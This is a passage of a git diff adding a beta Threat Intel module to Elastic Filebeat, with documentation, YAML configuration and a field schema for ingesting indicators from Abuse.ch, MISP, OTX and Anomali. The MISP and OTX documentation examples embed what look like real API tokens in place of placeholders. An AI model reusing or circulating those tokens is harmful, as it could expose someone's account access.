organization ID related to the event object. + + +type: keyword + +-- + +*`threatintel.misp.org.name`*:: ++ +-- +The organization name related to the event object. + + +type: keyword + +-- + +*`threatintel.misp.org.uuid`*:: ++ +-- +The UUID of the organization related to the event object. + + +type: keyword + +-- + +*`threatintel.misp.org.local`*:: ++ +-- +If the event object is local or from a remote source. + + +type: boolean + +-- + +*`threatintel.misp.orgc.id`*:: ++ +-- +The Organization Community ID in which the event object was reported from. + + +type: keyword + +-- + +*`threatintel.misp.orgc.name`*:: ++ +-- +The Organization Community name in which the event object was reported from. + + +type: keyword + +-- + +*`threatintel.misp.orgc.uuid`*:: ++ +-- +The Organization Community UUID in which the event object was reported from. + + +type: keyword + +-- + +*`threatintel.misp.orgc.local`*:: ++ +-- +If the Organization Community was local or synced from a remote source. + + +type: boolean + +-- + +*`threatintel.misp.attribute.id`*:: ++ +-- +The ID of the attribute related to the event object. + + +type: keyword + +-- + +*`threatintel.misp.attribute.type`*:: ++ +-- +The type of the attribute related to the event object. For example email, ipv4, sha1 and such. + + +type: keyword + +-- + +*`threatintel.misp.attribute.category`*:: ++ +-- +The category of the attribute related to the event object. For example "Network Activity". + + +type: keyword + +-- + +*`threatintel.misp.attribute.to_ids`*:: ++ +-- +If the attribute should be automatically synced with an IDS. + + +type: boolean + +-- + +*`threatintel.misp.attribute.uuid`*:: ++ +-- +The UUID of the attribute related to the event. + + +type: keyword + +-- + +*`threatintel.misp.attribute.event_id`*:: ++ +-- +The local event ID of the attribute related to the event. + + +type: keyword + +-- + +*`threatintel.misp.attribute.distribution`*:: ++ +-- +How the attribute has been distributed, represented by integer numbers. + + +type: long + +-- + +*`threatintel.misp.attribute.timestamp`*:: ++ +-- +The timestamp in which the attribute was attached to the event object. + + +type: date + +-- + +*`threatintel.misp.attribute.comment`*:: ++ +-- +Comments made to the attribute itself. + + +type: keyword + +-- + +*`threatintel.misp.attribute.sharing_group_id`*:: ++ +-- +The group ID of the sharing group related to the specific attribute. + + +type: keyword + +-- + +*`threatintel.misp.attribute.deleted`*:: ++ +-- +If the attribute has been removed from the event object. + + +type: boolean + +-- + +*`threatintel.misp.attribute.disable_correlation`*:: ++ +-- +If correlation has been enabled on the attribute related to the event object. + + +type: boolean + +-- + +*`threatintel.misp.attribute.object_id`*:: ++ +-- +The ID of the Object in which the attribute is attached. + + +type: keyword + +-- + +*`threatintel.misp.attribute.object_relation`*:: ++ +-- +The type of relation the attribute has with the event object itself. + + +type: keyword + +-- + +*`threatintel.misp.attribute.value`*:: ++ +-- +The value of the attribute, depending on the type like "url, sha1, email-src". + + +type: keyword + +-- + +[float] +=== otx + +Fields for OTX Threat Intel + + + +*`threatintel.otx.id`*:: ++ +-- +The ID of the indicator. + + +type: keyword + +-- + +*`threatintel.otx.indicator`*:: ++ +-- +The value of the indicator, for example if the type is domain, this would be the value. + + +type: keyword + +-- + +*`threatintel.otx.description`*:: ++ +-- +A description of the indicator. + + +type: keyword + +-- + +*`threatintel.otx.title`*:: ++ +-- +Title describing the indicator. + + +type: keyword + +-- + +*`threatintel.otx.content`*:: ++ +-- +Extra text or descriptive content related to the indicator. + + +type: keyword + +-- + +*`threatintel.otx.type`*:: ++ +-- +The indicator type, can for example be "domain, email, FileHash-SHA256". + + +type: keyword + +-- + [[exported-fields-tomcat]] == Apache Tomcat fields diff --git a/filebeat/docs/modules/threatintel.asciidoc b/filebeat/docs/modules/threatintel.asciidoc new file mode 100644 index 000000000000..ef98c6344cde --- /dev/null +++ b/filebeat/docs/modules/threatintel.asciidoc @@ -0,0 +1,314 @@ +//// +This file is generated! See scripts/docs_collector.py +//// + +[[filebeat-module-threatintel]] +[role="xpack"] + +:modulename: threatintel +:has-dashboards: false + + +== Threat Intel module +beta[] + +This module is a collection of different threat intelligence sources. The ingested data is meant to be used with [Indicator Match rules]https://www.elastic.co/guide/en/security/7.11/rules-ui-create.html#create-indicator-rule, but is also +compatible with other features like [Enrich Processors]https://www.elastic.co/guide/en/elasticsearch/reference/current/enrich-processor.html. +The related threat intel attribute that is meant to be used for matching incoming source data is stored under the `threatintel.indicator.*` fields. + +Currently supporting: +- `abuseurl` fileset: Supports URL entities from Abuse.ch +- `abusemalware` fileset: Supports Malware/Payload entities from Abuse.ch +- `misp` fileset: Supports gathering threat intel attributes from MISP +- `otx` fileset: Supports gathering threat intel attributes from Alienvault OTX +- `anomali` fileset: Supports gathering threat intel attributes from Anomali + +include::../include/gs-link.asciidoc[] + + +[float] +==== `abuseurl` fileset settings + +This fileset contacts the AbuseCH API and fetches all new malicious URLs found the last 60 minutes. + +To configure the module, please utilize the default URL unless specified as the example below: + +[source,yaml] +---- +- module: threatintel + abuseurl: + enabled: true + var.input: httpjson + var.url: https://urlhaus-api.abuse.ch/v1/urls/recent/ + var.interval: 60m +---- + +include::../include/var-paths.asciidoc[] + +*`var.url`*:: + +The URL of the API endpoint to connect with. + +*`var.interval`*:: + +How often the API is polled for updated information. + +AbuseCH URL Threat Intel is mapped to the following ECS fields +[options="header"] +|============================================================== +| URL Threat Intel Fields' | ECS Fields | +| url | threat.indicator.url.full | +| date_added | @timestamp | +| host | threat.indicator.ip/domain | +|============================================================== + +[float] +==== `abusemalware` fileset settings + +This fileset contacts the AbuseCH API and fetches all new malicious hashes found the last 60 minutes. + +To configure the module, please utilize the default URL unless specified as the example below: + +[source,yaml] +---- +- module: threatintel + abusemalware: + enabled: true + var.input: httpjson + var.url: https://urlhaus-api.abuse.ch/v1/payloads/recent/ + var.interval: 60m +---- + +include::../include/var-paths.asciidoc[] + +*`var.url`*:: + +The URL of the API endpoint to connect with. + +*`var.interval`*:: + +How often the API is polled for updated information. + +AbuseCH Malware Threat Intel is mapped to the following ECS fields +[options="header"] +|================================================================ +| Malware Threat IntelFields | ECS Fields | +| md5_hash | threat.indicato.file.hash.md5 | +| sha256_hash | threat.indicator.file.hash.sha256| +| file_size | threat.indicator.file.size | +|================================================================ + +[float] +==== `misp` fileset settings + +This fileset communicates with a local or remote MISP server. Not to be confused with the older MISP Module (link here). + +The fileset configuration allows to set the polling interval, how far back it should look initially, and optionally any filters used to filter the results. + +[source,yaml] +---- +- module: threatintel + misp: + enabled: true + var.input: httpjson + var.url: https://SERVER/events/restSearch + var.api_token: xVfaM3DSt8QEwO2J1ix00V4ZHJs14nq5GMsHcK6Z + var.initial_interval: 24h + var.interval: 60m +---- + +To configure the output with filters, use fields that already exist on the MISP server, and define either a single value or multiple. +By adding a filter, only events that has attributes which matches the filter will be returned. + +The below filters is only examples, for a full list of all fields please reference the MISP fields located on the MISP server itself. + +[source,yaml] +---- +- module: threatintel + misp: + enabled: true + var.input: httpjson + var.url: https://SERVER/events/restSearch + var.api_token: xVfaM3DSt8QEwO2J1ix00V4ZHJs14nq5GMsHcK6Z + var.filters: + - type: ["md5", "sha256", "url", "ip-src"] + - threat_level: 4 + var.initial_interval: 24h + var.interval: 60m +---- + +include::../include/var-paths.asciidoc[] + +*`var.url`*:: + +The URL of the API endpoint to connect with. + +*`var.interval`*:: + +How often the API is polled for updated information. + +*`var.first_interval`*:: + +How far back to search when retrieving events the first time the beat starts up. +After the first interval has passed the module itself will use the timestamp from the last response as the filter when retrieving new events. + +*`var.filters`*:: + +List of filters to apply when retrieving new events from the MISP server, this field is optional and defaults to all events. + +MISP Threat Intel is mapped to the following ECS fields +[options="header"] +|============================================================== +| Malware Threat IntelFields | ECS Fields | +| misp.first_seen | threat.indicator.first_seen | +| misp.last_seen | threat.indicator.last_seen | +| misp.tag | tag | +| misp.value | threat.indicator.* | +|============================================================== +misp.value is mapped to the appropriate field dependant on attribute type + +[float] +==== `otx` fileset settings + +To configure the module, please utilize the default URL unless specified as the example below: + +[source,yaml] +---- +- module: threatintel + otx: + enabled: true + var.input: httpjson + var.url: https://otx.alienvault.com/api/v1/indicators/export + var.api_token: 754dcaafbcb9740dc0d119e72d5eaad699cc4a5cdbc856fc6215883842ba8142 + var.first_interval: 24h + var.lookback_range: 2h + var.interval: 60m +---- + +To filter only on specific indicator types, this is an example of some possible filters supported: + +[source,yaml] +---- +- module: threatintel + otx: + enabled: true + var.input: httpjson + var.url: https://otx.alienvault.com/api/v1/indicators/export + var.types: "domain,IPv4,hostname,url,FileHash-SHA256" + var.first_interval: 24h + var.interval: 60m +---- + +include::../include/var-paths.asciidoc[] + +*`var.url`*:: + +The URL of the API endpoint to connect with. + +*`var.api_token`*:: + +The API key used to access OTX. This can be found on your https://otx.alienvault.com/api[OTX API homepage]. + +*`var.interval`*:: + +How often the API is polled for updated information. + +*`var.first_interval`*:: + +How far back to search when retrieving events the first time the beat starts up. +After the first interval has passed the module itself will use the timestamp from the last response as the filter when retrieving new events. + +*`var.types`*:: + +A comma delimited list of indicator types to include, defaults to all. A list of possible types to filter on can be found on the https://cybersecurity.att.com/documentation/usm-appliance/otx/about-otx.htm[Alienvault OTX documentation page] + + +OTX Threat Intel is mapped to the following ECS fields +[options="header"] +|======================================================| +| Malware Threat IntelFields | ECS Fields | +| otx.type | threat.indicator.type | +| otx.description | threat.indicator.description | +| otx.indicator | threat.indicator.* | +|======================================================| +otx.indicator is mapped to the appropriate field dependant on attribute type. + +[float] +==== `anomali` fileset settings + +To configure the module please fill in the credentials, for Anomali Limo (the free Taxii service) these are usually default credentials found at the https://www.anomali.com/resources/limo[Anomali Limo webpage] +Anomali Limo offers multiple sources called collections. Each collection has a specific ID, which then fits into the url +used in this configuration. A list of different collections can be found using the credentials at https://limo.anomali.com/api/v1/taxii2/feeds/collections/[Limo Collections]. + +The example below uses the collection of ID 41 as can be seen in the URL. + +[source,yaml] +---- +- module: threatintel + anomali: + enabled: true + var.input: httpjson + var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/41/objects?match[type]=indicator + var.username: guest + var.password: guest + var.interval: 60m +---- + +To filter on specifc types, you can define var.types as a comma delimited list of object types. This defaults to "indicators" + +[source,yaml] +---- +- module: threatintel + anomali: + enabled: true + var.input: httpjson + var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/41/objects?match[type]=indicator + var.types: "indicators,other" + var.username: guest + var.password: guest + var.interval: 60m +---- + +include::../include/var-paths.asciidoc[] + +*`var.url`*:: + +The URL of the API endpoint to connect with. Limo offers multiple collections of threat intelligence. + +*`var.username`*:: + +Username used to access the API. + +*`var.password`*:: + +Password used to access the API. + +*`var.interval`*:: + +How often the API is polled for updated information. + +*`var.types`*:: + +A comma delimited list of indicator types to include, defaults to all. A list of possible types to filter on can be found on the https://oasis-open.github.io/cti-documentation/stix/intro.html#stix-21-objects[Stix 2.1 Object types] page. + +Anomali Threat Intel is mapped to the following ECS fields +[options="header"] +|============================================================== +| Malware Threat IntelFields | ECS Fields | +| anomali.description | threat.indicator.description | +| anomali.created | threat.indicator.first_seen | +| anomali.modified | threat.indicator.last_seen | +| anomali.pattern | threat.indicator.* | +| anomali.labels | tags | +|============================================================== +anomali.pattern is mapped to the appropriate field dependant on attribute type. + +:modulename!: + + +[float] +=== Fields + +For a description of each field in the module, see the +<> section. + diff --git a/filebeat/docs/modules_list.asciidoc b/filebeat/docs/modules_list.asciidoc index 8d97764be50b..1a3da8bca3d7 100644 --- a/filebeat/docs/modules_list.asciidoc +++ b/filebeat/docs/modules_list.asciidoc @@ -63,6 +63,7 @@ This file is generated! See scripts/docs_collector.py * <> * <> * <> + * <> * <> * <> * <> @@ -133,6 +134,7 @@ include::modules/sophos.asciidoc[] include::modules/squid.asciidoc[] include::modules/suricata.asciidoc[] include::modules/system.asciidoc[] +include::modules/threatintel.asciidoc[] include::modules/tomcat.asciidoc[] include::modules/traefik.asciidoc[] include::modules/zeek.asciidoc[] diff --git a/filebeat/tests/system/test_modules.py b/filebeat/tests/system/test_modules.py index 2aa5d9198ab5..dc5d42c64726 100644 --- a/filebeat/tests/system/test_modules.py +++ b/filebeat/tests/system/test_modules.py @@ -270,7 +270,11 @@ def clean_keys(obj): "gsuite.saml", "gsuite.user_accounts", "zoom.webhook", - "snyk.vulnerabilities", + "threatintel.otx", + "threatintel.abuseurl", + "threatintel.abusemalware", + "threatintel.anomali", + "snyk.vulnerabilities" } # dataset + log file pairs for which @timestamp is kept as an exception from above remove_timestamp_exception = { diff --git a/x-pack/filebeat/filebeat.reference.yml b/x-pack/filebeat/filebeat.reference.yml index 16c974895a34..c9e00d6993de 100644 --- a/x-pack/filebeat/filebeat.reference.yml +++ b/x-pack/filebeat/filebeat.reference.yml @@ -1972,6 +1972,102 @@ filebeat.modules: # Filebeat will choose the paths depending on your OS. #var.paths: +#----------------------------- Threatintel Module ----------------------------- +- module: threatintel + abuseurl: + enabled: true + + # Input used for ingesting threat intel data. + var.input: httpjson + + # The URL used for Threat Intel API calls. + var.url: https://urlhaus-api.abuse.ch/v1/urls/recent/ + + # The interval to poll the API for updates. + var.interval: 60m + + abusemalware: + enabled: true + + # Input used for ingesting threat intel data. + var.input: httpjson + + # The URL used for Threat Intel API calls. + var.url: https://urlhaus-api.abuse.ch/v1/payloads/recent/ + + # The interval to poll the API for updates. + var.interval: 60m + + misp: + enabled: true + + # Input used for ingesting threat intel data, defaults to JSON. + var.input: httpjson + + # The URL of the MISP instance, should end with "/events/restSearch". + var.url: https://SERVER/events/restSearch + + # The authentication token used to contact the MISP API. Found when looking at user account in the MISP UI. + var.api_token: API_KEY + + # Optional filters that can be applied to the API for filtering out results. This should support the majority of fields in a MISP context. + # For examples please reference the filebeat module documentation. + #var.filters: + # - threat_level: [4, 5] + # - to_ids: true + + # How far back to look once the beat starts up for the first time, the value has to be in hours. Each request afterwards will filter on any event newer + # than the last event that was already ingested. + var.first_interval: 24h + + # The interval to poll the API for updates. + var.interval: 60m + + otx: + enabled: true + + # Input used for ingesting threat intel data + var.input: httpjson + + # The URL used for OTX Threat Intel API calls. + var.url: https://otx.alienvault.com/api/v1/indicators/export + + # The authentication token used to contact the OTX API, can be found on the OTX UI. + var.api_token: API_KEY + + # Optional filters that can be applied to retrieve only specific indicators. + #var.types: "domain,IPv4,hostname,url,FileHash-SHA256" + + # How many hours to look back for each request, should be close to the configured interval. Deduplication of events is handled by the module. + var.lookback_range: 2h + + # How far back to look once the beat starts up for the first time, the value has to be in hours. + var.first_interval: 24h + + # The interval to poll the API for updates + var.interval: 60m + + anomali: + enabled: true + + # Input used for ingesting threat intel data + var.input: httpjson + + # The URL used for Threat Intel API calls. + var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/41/objects + + # The Username used by anomali Limo, defaults to guest. + #var.username: guest + + # The password used by anomali Limo, defaults to guest. + #var.password: guest + + # How far back to look once the beat starts up for the first time, the value has to be in hours. + var.first_interval: 24h + + # The interval to poll the API for updates + var.interval: 60m + #---------------------------- Apache Tomcat Module ---------------------------- - module: tomcat log: diff --git a/x-pack/filebeat/include/list.go b/x-pack/filebeat/include/list.go index f760be10844a..a21eb75380f9 100644 --- a/x-pack/filebeat/include/list.go +++ b/x-pack/filebeat/include/list.go @@ -55,6 +55,7 @@ import ( _ "github.com/elastic/beats/v7/x-pack/filebeat/module/sophos" _ "github.com/elastic/beats/v7/x-pack/filebeat/module/squid" _ "github.com/elastic/beats/v7/x-pack/filebeat/module/suricata" + _ "github.com/elastic/beats/v7/x-pack/filebeat/module/threatintel" _ "github.com/elastic/beats/v7/x-pack/filebeat/module/tomcat" _ "github.com/elastic/beats/v7/x-pack/filebeat/module/zeek" _ "github.com/elastic/beats/v7/x-pack/filebeat/module/zoom" diff --git a/x-pack/filebeat/module/threatintel/_meta/config.yml b/x-pack/filebeat/module/threatintel/_meta/config.yml new file mode 100644 index 000000000000..9ee88db47ed7 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/_meta/config.yml @@ -0,0 +1,94 @@ +- module: threatintel + abuseurl: + enabled: true + + # Input used for ingesting threat intel data. + var.input: httpjson + + # The URL used for Threat Intel API calls. + var.url: https://urlhaus-api.abuse.ch/v1/urls/recent/ + + # The interval to poll the API for updates. + var.interval: 60m + + abusemalware: + enabled: true + + # Input used for ingesting threat intel data. + var.input: httpjson + + # The URL used for Threat Intel API calls. + var.url: https://urlhaus-api.abuse.ch/v1/payloads/recent/ + + # The interval to poll the API for updates. + var.interval: 60m + + misp: + enabled: true + + # Input used for ingesting threat intel data, defaults to JSON. + var.input: httpjson + + # The URL of the MISP instance, should end with "/events/restSearch". + var.url: https://SERVER/events/restSearch + + # The authentication token used to contact the MISP API. Found when looking at user account in the MISP UI. + var.api_token: API_KEY + + # Optional filters that can be applied to the API for filtering out results. This should support the majority of fields in a MISP context. + # For examples please reference the filebeat module documentation. + #var.filters: + # - threat_level: [4, 5] + # - to_ids: true + + # How far back to look once the beat starts up for the first time, the value has to be in hours. Each request afterwards will filter on any event newer + # than the last event that was already ingested. + var.first_interval: 24h + + # The interval to poll the API for updates. + var.interval: 60m + + otx: + enabled: true + + # Input used for ingesting threat intel data + var.input: httpjson + + # The URL used for OTX Threat Intel API calls. + var.url: https://otx.alienvault.com/api/v1/indicators/export + + # The authentication token used to contact the OTX API, can be found on the OTX UI. + var.api_token: API_KEY + + # Optional filters that can be applied to retrieve only specific indicators. + #var.types: "domain,IPv4,hostname,url,FileHash-SHA256" + + # How many hours to look back for each request, should be close to the configured interval. Deduplication of events is handled by the module. + var.lookback_range: 2h + + # How far back to look once the beat starts up for the first time, the value has to be in hours. + var.first_interval: 24h + + # The interval to poll the API for updates + var.interval: 60m + + anomali: + enabled: true + + # Input used for ingesting threat intel data + var.input: httpjson + + # The URL used for Threat Intel API calls. + var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/41/objects + + # The Username used by anomali Limo, defaults to guest. + #var.username: guest + + # The password used by anomali Limo, defaults to guest. + #var.password: guest + + # How far back to look once the beat starts up for the first time, the value has to be in hours. + var.first_interval: 24h + + # The interval to poll the API for updates + var.interval: 60m diff --git a/x-pack/filebeat/module/threatintel/_meta/docs.asciidoc b/x-pack/filebeat/module/threatintel/_meta/docs.asciidoc new file mode 100644 index 000000000000..b6711a419dcc --- /dev/null +++ b/x-pack/filebeat/module/threatintel/_meta/docs.asciidoc @@ -0,0 +1,301 @@ +[role="xpack"] + +:modulename: threatintel +:has-dashboards: false + + +== Threat Intel module +beta[] + +This module is a collection of different threat intelligence sources. The ingested data is meant to be used with [Indicator Match rules]https://www.elastic.co/guide/en/security/7.11/rules-ui-create.html#create-indicator-rule, but is also +compatible with other features like [Enrich Processors]https://www.elastic.co/guide/en/elasticsearch/reference/current/enrich-processor.html. +The related threat intel attribute that is meant to be used for matching incoming source data is stored under the `threatintel.indicator.*` fields. + +Currently supporting: +- `abuseurl` fileset: Supports URL entities from Abuse.ch +- `abusemalware` fileset: Supports Malware/Payload entities from Abuse.ch +- `misp` fileset: Supports gathering threat intel attributes from MISP +- `otx` fileset: Supports gathering threat intel attributes from Alienvault OTX +- `anomali` fileset: Supports gathering threat intel attributes from Anomali + +include::../include/gs-link.asciidoc[] + + +[float] +==== `abuseurl` fileset settings + +This fileset contacts the AbuseCH API and fetches all new malicious URLs found the last 60 minutes. + +To configure the module, please utilize the default URL unless specified as the example below: + +[source,yaml] +---- +- module: threatintel + abuseurl: + enabled: true + var.input: httpjson + var.url: https://urlhaus-api.abuse.ch/v1/urls/recent/ + var.interval: 60m +---- + +include::../include/var-paths.asciidoc[] + +*`var.url`*:: + +The URL of the API endpoint to connect with. + +*`var.interval`*:: + +How often the API is polled for updated information. + +AbuseCH URL Threat Intel is mapped to the following ECS fields +[options="header"] +|============================================================== +| URL Threat Intel Fields' | ECS Fields | +| url | threat.indicator.url.full | +| date_added | @timestamp | +| host | threat.indicator.ip/domain | +|============================================================== + +[float] +==== `abusemalware` fileset settings + +This fileset contacts the AbuseCH API and fetches all new malicious hashes found the last 60 minutes. + +To configure the module, please utilize the default URL unless specified as the example below: + +[source,yaml] +---- +- module: threatintel + abusemalware: + enabled: true + var.input: httpjson + var.url: https://urlhaus-api.abuse.ch/v1/payloads/recent/ + var.interval: 60m +---- + +include::../include/var-paths.asciidoc[] + +*`var.url`*:: + +The URL of the API endpoint to connect with. + +*`var.interval`*:: + +How often the API is polled for updated information. + +AbuseCH Malware Threat Intel is mapped to the following ECS fields +[options="header"] +|================================================================ +| Malware Threat IntelFields | ECS Fields | +| md5_hash | threat.indicato.file.hash.md5 | +| sha256_hash | threat.indicator.file.hash.sha256| +| file_size | threat.indicator.file.size | +|================================================================ + +[float] +==== `misp` fileset settings + +This fileset communicates with a local or remote MISP server. Not to be confused with the older MISP Module (link here). + +The fileset configuration allows to set the polling interval, how far back it should look initially, and optionally any filters used to filter the results. + +[source,yaml] +---- +- module: threatintel + misp: + enabled: true + var.input: httpjson + var.url: https://SERVER/events/restSearch + var.api_token: xVfaM3DSt8QEwO2J1ix00V4ZHJs14nq5GMsHcK6Z + var.initial_interval: 24h + var.interval: 60m +---- + +To configure the output with filters, use fields that already exist on the MISP server, and define either a single value or multiple. +By adding a filter, only events that has attributes which matches the filter will be returned. + +The below filters is only examples, for a full list of all fields please reference the MISP fields located on the MISP server itself. + +[source,yaml] +---- +- module: threatintel + misp: + enabled: true + var.input: httpjson + var.url: https://SERVER/events/restSearch + var.api_token: xVfaM3DSt8QEwO2J1ix00V4ZHJs14nq5GMsHcK6Z + var.filters: + - type: ["md5", "sha256", "url", "ip-src"] + - threat_level: 4 + var.initial_interval: 24h + var.interval: 60m +---- + +include::../include/var-paths.asciidoc[] + +*`var.url`*:: + +The URL of the API endpoint to connect with. + +*`var.interval`*:: + +How often the API is polled for updated information. + +*`var.first_interval`*:: + +How far back to search when retrieving events the first time the beat starts up. +After the first interval has passed the module itself will use the timestamp from the last response as the filter when retrieving new events. + +*`var.filters`*:: + +List of filters to apply when retrieving new events from the MISP server, this field is optional and defaults to all events. + +MISP Threat Intel is mapped to the following ECS fields +[options="header"] +|============================================================== +| Malware Threat IntelFields | ECS Fields | +| misp.first_seen | threat.indicator.first_seen | +| misp.last_seen | threat.indicator.last_seen | +| misp.tag | tag | +| misp.value | threat.indicator.* | +|============================================================== +misp.value is mapped to the appropriate field dependant on attribute type + +[float] +==== `otx` fileset settings + +To configure the module, please utilize the default URL unless specified as the example below: + +[source,yaml] +---- +- module: threatintel + otx: + enabled: true + var.input: httpjson + var.url: https://otx.alienvault.com/api/v1/indicators/export + var.api_token: 754dcaafbcb9740dc0d119e72d5eaad699cc4a5cdbc856fc6215883842ba8142 + var.first_interval: 24h + var.lookback_range: 2h + var.interval: 60m +---- + +To filter only on specific indicator types, this is an example of some possible filters supported: + +[source,yaml] +---- +- module: threatintel + otx: + enabled: true + var.input: httpjson + var.url: https://otx.alienvault.com/api/v1/indicators/export + var.types: "domain,IPv4,hostname,url,FileHash-SHA256" + var.first_interval: 24h + var.interval: 60m +---- + +include::../include/var-paths.asciidoc[] + +*`var.url`*:: + +The URL of the API endpoint to connect with. + +*`var.api_token`*:: + +The API key used to access OTX. This can be found on your https://otx.alienvault.com/api[OTX API homepage]. + +*`var.interval`*:: + +How often the API is polled for updated information. + +*`var.first_interval`*:: + +How far back to search when retrieving events the first time the beat starts up. +After the first interval has passed the module itself will use the timestamp from the last response as the filter when retrieving new events. + +*`var.types`*:: + +A comma delimited list of indicator types to include, defaults to all. A list of possible types to filter on can be found on the https://cybersecurity.att.com/documentation/usm-appliance/otx/about-otx.htm[Alienvault OTX documentation page] + + +OTX Threat Intel is mapped to the following ECS fields +[options="header"] +|======================================================| +| Malware Threat IntelFields | ECS Fields | +| otx.type | threat.indicator.type | +| otx.description | threat.indicator.description | +| otx.indicator | threat.indicator.* | +|======================================================| +otx.indicator is mapped to the appropriate field dependant on attribute type. + +[float] +==== `anomali` fileset settings + +To configure the module please fill in the credentials, for Anomali Limo (the free Taxii service) these are usually default credentials found at the https://www.anomali.com/resources/limo[Anomali Limo webpage] +Anomali Limo offers multiple sources called collections. Each collection has a specific ID, which then fits into the url +used in this configuration. A list of different collections can be found using the credentials at https://limo.anomali.com/api/v1/taxii2/feeds/collections/[Limo Collections]. + +The example below uses the collection of ID 41 as can be seen in the URL. + +[source,yaml] +---- +- module: threatintel + anomali: + enabled: true + var.input: httpjson + var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/41/objects?match[type]=indicator + var.username: guest + var.password: guest + var.interval: 60m +---- + +To filter on specifc types, you can define var.types as a comma delimited list of object types. This defaults to "indicators" + +[source,yaml] +---- +- module: threatintel + anomali: + enabled: true + var.input: httpjson + var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/41/objects?match[type]=indicator + var.types: "indicators,other" + var.username: guest + var.password: guest + var.interval: 60m +---- + +include::../include/var-paths.asciidoc[] + +*`var.url`*:: + +The URL of the API endpoint to connect with. Limo offers multiple collections of threat intelligence. + +*`var.username`*:: + +Username used to access the API. + +*`var.password`*:: + +Password used to access the API. + +*`var.interval`*:: + +How often the API is polled for updated information. + +*`var.types`*:: + +A comma delimited list of indicator types to include, defaults to all. A list of possible types to filter on can be found on the https://oasis-open.github.io/cti-documentation/stix/intro.html#stix-21-objects[Stix 2.1 Object types] page. + +Anomali Threat Intel is mapped to the following ECS fields +[options="header"] +|============================================================== +| Malware Threat IntelFields | ECS Fields | +| anomali.description | threat.indicator.description | +| anomali.created | threat.indicator.first_seen | +| anomali.modified | threat.indicator.last_seen | +| anomali.pattern | threat.indicator.* | +| anomali.labels | tags | +|============================================================== +anomali.pattern is mapped to the appropriate field dependant on attribute type. + +:modulename!: diff --git a/x-pack/filebeat/module/threatintel/_meta/fields.yml b/x-pack/filebeat/module/threatintel/_meta/fields.yml new file mode 100644 index 000000000000..c399b21ec66b --- /dev/null +++ b/x-pack/filebeat/module/threatintel/_meta/fields.yml @@ -0,0 +1,365 @@ +- key: threatintel + title: threatintel + release: beta + description: > + Threat intelligence Filebeat Module. + fields: + - name: threatintel + default_field: false + type: group + description: > + Fields from the threatintel Filebeat module. + fields: + - name: indicator.first_seen + type: keyword + description: > + The date and time when intelligence source first reported sighting this indicator. + - name: indicator.last_seen + type: date + description: > + The date and time when intelligence source last reported sighting this indicator. + - name: indicator.sightings + type: long + description: > + Number of times this indicator was observed conducting threat activity. + - name: indicator.type + type: keyword + description: > + Type of indicator as represented by Cyber Observable in STIX 2.0. + Expected values + * autonomous-system + * artifact + * directory + * domain-name + * email-addr + * file + * ipv4-addr + * ipv6-addr + * mac-addr + * mutex + * process + * software + * url + * user-account + * windows-registry-key + * x-509-certificate + - name: indicator.description + type: keyword + description: > + Describes the type of action conducted by the threat. + - name: indicator.scanner_stats + type: long + description: > + Count of AV/EDR vendors that successfully detected malicious file or URL. + - name: indicator.provider + type: keyword + description: > + Identifies the name of the intelligence provider. + - name: indicator.confidence + type: keyword + description: > + Identifies the confidence rating assigned by the provider using STIX confidence scales. + Expected values + * Not Specified, None, Low, Medium, High + * 0-10 + * Admirality Scale (1-6) + * DNI Scale (5-95) + * WEP Scale (Impossible - Certain) + - name: indicator.module + type: keyword + description: > + Identifies the name of specific module this data is coming from. + - name: indicator.dataset + type: keyword + description: > + Identifies the name of specific dataset from the intelligence source. + - name: indicator.ip + type: ip + description: > + Identifies a threat indicator as an IP address (irrespective of direction). + - name: indicator.domain + type: keyword + description: > + Identifies a threat indicator as a domain (irrespective of direction). + - name: indicator.port + type: long + description: > + Identifies a threat indicator as a port number (irrespective of direction). + - name: indicator.email.address + type: keyword + description: > + Identifies a threat indicator as an email address (irrespective of direction). + - name: indicator.marking.tlp + type: keyword + description: > + Traffic Light Protocol sharing markings. + Expected values are: + * White + * Green + * Amber + * Red + - name: indicator.matched + type: group + fields: + - name: atomic + type: keyword + description: > + Identifies the atomic indicator that matched a local environment endpoint or network event. + - name: field + type: keyword + description: > + Identifies the field of the atomic indicator that matched a local environment endpoint or network event. + - name: type + type: keyword + description: > + Identifies the type of the atomic indicator that matched a local environment endpoint or network event. + - name: indicator.as + type: group + fields: + - name: number + type: long + description: Unique number allocated to the autonomous system. The autonomous system number (ASN) + uniquely identifies each network on the Internet. + example: 15169 + - name: organization.name + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + description: Organization name. + example: Google LLC + - name: indicator.registry + type: group + fields: + - name: data.strings + type: keyword + ignore_above: 1024 + description: > + Content when writing string types. + Populated as an array when writing string data to the registry. For single + string registry types (REG_SZ, REG_EXPAND_SZ), this should be an array with + one string. For sequences of string with REG_MULTI_SZ, this array will be + variable length. For numeric data, such as REG_DWORD and REG_QWORD, this should + be populated with the decimal representation (e.g `"1"`). + example: '["C:\rta\red_ttp\bin\myapp.exe"]' + - name: path + type: keyword + ignore_above: 1024 + description: Full path, including hive, key and value + example: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution + Options\winword.exe\Debugger + - name: value + type: keyword + ignore_above: 1024 + description: Name of the value written. + example: Debugger + - name: key + type: keyword + ignore_above: 1024 + description: Registry key value + - name: indicator.geo + type: group + fields: + - name: geo.city_name + type: keyword + ignore_above: 1024 + description: City name. + example: Montreal + - name: geo.country_iso_code + type: keyword + ignore_above: 1024 + description: Country ISO code. + example: CA + - name: geo.country_name + type: keyword + ignore_above: 1024 + description: Country name. + example: Canada + - name: geo.location + type: geo_point + description: Longitude and latitude. + example: '{ "lon": -73.614830, "lat": 45.505918 }' + - name: geo.region_iso_code + type: keyword + ignore_above: 1024 + description: Region ISO code. + example: CA-QC + - name: geo.region_name + type: keyword + ignore_above: 1024 + description: Region name. + example: Quebec + - name: indicator.file.pe.imphash + type: keyword + ignore_above: 1024 + description: 'A hash of the imports in a PE file. An imphash -- or import hash + -- can be used to fingerprint binaries even after recompilation or other code-level + transformations have occurred, which would change more traditional hash values. + Learn more at 